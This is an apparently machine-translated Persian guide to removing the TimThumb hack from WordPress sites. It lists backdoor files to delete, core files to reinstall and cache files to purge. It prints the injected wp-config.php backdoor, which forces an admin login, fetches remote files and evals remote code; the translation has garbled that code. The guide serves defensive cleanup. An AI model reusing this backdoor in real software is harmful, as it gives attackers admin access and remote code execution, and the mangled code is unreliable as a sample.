نحوه رفع و پاکسازی هک TimThumb در وردپرس

بنابراین اگر درست به خاطر بیاورید ، در اوت یک مشکل امنیتی با اسکریپت TimThumb وجود داشت که رفع شد. اما با کمال تعجب ، بسیاری از سایتها هنوز از نسخه قدیمی استفاده می کنند. در ماه گذشته تاکنون سه سایت برطرف کرده ایم که یکی دیروز بوده است. بنابراین منطقی است که به راحتی مقاله ای گام به گام بنویسید ، بنابراین کاربران ما فقط می توانند آن را دنبال کنند. هر سه کاربری که ما این مشکل را برطرف کردیم حتی نمی دانستند TimThumb چیست یا آیا از آن استفاده می کنند یا نه.

TimThumb یک اسکریپت PHP است که اندازه تصاویر را تغییر می دهد. یک آسیب پذیری در آن وجود داشت ، اما اکنون استفاده از آن ایمن است.

بنابراین از کجا می دانید سایت شما هک شده است؟ اگر هنگام بازدید از سایت خود ، صفحه قرمز بزرگی در مرورگر خود مشاهده می کنید:

اگر با ایمیل های مربوط به هدایت کاربران از سایت خود بمب گذاری می کنید. به احتمال زیاد ، مسئله این است که سایت شما قربانی این سو استفاده شده است.

به عنوان یک اقدام پیشگیرانه ، همه باید فقط از این اسکنر آسیب پذیری Timthumb . اگر از نسخه قدیمی TimThumb استفاده می کنید این به شما نشان می دهد. بسیاری از کلوپ های موضوعی بلافاصله هسته اصلی خود را ارتقا دادند. بنابراین این پلاگین بررسی می کند که آیا نسخه امن جدید Timthumb نصب شده است یا نسخه قدیمی تر نصب شده است.

حال اگر سایت شما قبلاً به دام این بهره برداری Timthumb افتاده باشد ، در اینجا آنچه باید انجام دهید آورده شده است.

ابتدا باید پرونده های زیر را حذف کنید:

 / wp-admin / upd.php
/wp-content/upd.php 

وارد پنل مدیریت وردپرس شوید و نسخه وردپرس خود را دوباره نصب کنید. ما به طور خاص به دنبال نصب مجدد این پرونده ها هستیم:

/wp-settings.php
/wp-includes/js/jquery/jquery.js
/wp-includes/js/110n.js

سپس wp-config.php خود را باز کنید در جایی که به احتمال زیاد این کد بزرگ بدافزار را پیدا می کنید که در حال جمع آوری اطلاعات ورود به سیستم و کوکی ها است. این کد به سمت پایین خواهد بود.

if (Isset ($ _ GET ['pingnow']) && Isset ($ _ GET ['Pass']))) {
if ($ _GET ['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22') {
if ($ _GET ['pingnow'] == 'ورود به سیستم') {
$ user_login = 'مدیر'؛
$ user = get_userdatabylogin ($ user_login)؛
$ user_id = $ user-> شناسه؛
wp_set_current_user ($ user_id ، $ user_login)؛
wp_set_auth_cookie ($ user_id) ؛
do_action ('wp_login'، $ user_login)؛
}
if (($ _GET ['pingnow'] == 'exec') && (Isset ($ _ GET ['پرونده'])))) {
$ ch = curl_init ($ _ GET ['پرونده'])؛
$ fnm = md5 (رند (0،100)). '. php'؛
$ fp = fopen ($ fnm ، "w") ؛
curl_setopt ($ ch ، CURLOPT_FILE ، $ fp)؛
curl_setopt ($ ch ، CURLOPT_HEADER ، 0)؛
curl_setopt ($ ch ، CURLOPT_TIMEOUT ، 5)؛
curl_exec ($ ch)
curl_close ($ ch)
fclose ($ fp) ؛
echo ""؛
}
if (($ _GET ['pingnow'] == 'eval') && (Isset ($ _ GET ['پرونده']))))) {
$ ch = curl_init ($ _ GET ['پرونده'])؛
curl_setopt ($ ch ، CURLOPT_RETURNTRANSFER ، درست است)؛
curl_setopt ($ ch ، CURLOPT_HEADER ، 0)؛
curl_setopt ($ ch ، CURLOPT_TIMEOUT ، 5)؛
$ re = curl_exec ($ ch)؛
curl_close ($ ch)
eval ($ دوباره)؛
}}}

در پوشه طرح زمینه خود ، به هرجایی که اسکریپت TimThumb ممکن است پرونده های ذخیره شده را ذخیره کند ، بگردید. معمولاً آنها در این ساختار هستند:

/wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
/wp-content/themes/themename/temp/cache/external_{MD5Hash}.php

همه مواردی را که به این شکل هستند حذف کنید. اگر از موارد مطمئن نیستید ، همه مواردی را که پرونده تصویری نیست حذف کنید.

مورد بعدی که می خواهید انجام دهید این است که timthumb.php را با آخرین نسخه جایگزین کنید که می توانید در http://timthumb.googlecode.com/svn/trunk/timthumb.php

اکنون بهتر است گذرواژه های خود را از اطلاعات ورود MySQL به اطلاعات ورود به وردپرس تغییر دهید. فراموش نکنید که رمز عبور MySQL را در wp-config.php تغییر دهید در غیر اینصورت صفحه “خطا در برقراری اتصال” را دریافت خواهید کرد.

کلیدهای مخفی را در پرونده wp-config.php تغییر دهید. با رفتن به سازنده آنلاین .

اکنون کار شما تمام شده است. فراموش نکنید که همه پلاگین های ذخیره صفحه را خالی کنید. به عنوان یک اقدام احتیاطی ، خوب است که حافظه پنهان و کوکی های مرورگرهای خود را نیز پاک کنید.

برای توسعه دهندگان ، سعی کنید از ویژگی اندازه های اضافی تصویر در وردپرس برای جایگزینی ویژگی های Timthumb.

در صورت نیاز به کمک بیشتر با استفاده از فرم تماس ما به ما اطلاع دهید.